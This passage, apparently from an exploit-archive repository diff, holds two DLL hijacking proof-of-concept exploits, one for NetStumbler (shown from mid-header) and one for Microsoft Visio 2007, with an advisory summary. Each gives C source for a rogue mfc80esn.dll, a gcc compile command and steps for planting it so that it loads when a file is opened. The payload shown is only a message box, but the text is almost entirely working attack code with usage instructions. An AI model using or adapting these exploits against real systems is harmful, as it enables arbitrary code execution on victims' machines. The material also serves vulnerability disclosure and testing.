Found by Pepelux <pepelux[at]enye-sec.org>
http://www.pepelux.org
eNYe-Sec - www.enye-sec.org
Tested on: Windows XP SP2 && Windows XP SP3
How to use :
1> Compile this code as mfc80esn.dll
gcc -shared -o mfc80esn.dll thiscode.c
2> Move DLL file to the directory where NetStumbler is installed
3> Open any file recognized by NetStumbler
*/
#include <windows.h>
#define DllExport __declspec (dllexport)
int mes()
{
MessageBox(0, "DLL Hijacking vulnerable", "Pepelux", MB_OK);
return 0;
}
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{mes();}

45
platforms/windows/remote/34832.c Executable file
View file

@ -0,0 +1,45 @@
source: http://www.securityfocus.com/bid/43914/info
Microsoft Visio is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
Microsoft Visio 2007 is vulnerable; other versions may also be affected.
/*
=========================================================
Microsoft Visio 2007 DLL Hijacking Exploit (mfc80esn.dll)
=========================================================
$ Program: MS Visio
$ Version: 2007
$ Download: http://office.microsoft.com/es-es/downloads/CH010225969.aspx
$ Date: 2010/10/08
Found by Pepelux <pepelux[at]enye-sec.org>
http://www.pepelux.org
eNYe-Sec - www.enye-sec.org
Tested on: Windows XP SP2 && Windows XP SP3
How to use :
1> Compile this code as mfc80esn.dll
gcc -shared -o mfc80esn.dll thiscode.c
2> Move DLL file to the directory where Visio is installed
3> Open any file recognized by msvisio
*/
#include <windows.h>
#define DllExport __declspec (dllexport)
int mes()
{
MessageBox(0, "DLL Hijacking vulnerable", "Pepelux", MB_OK);
return 0;
}
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{mes();}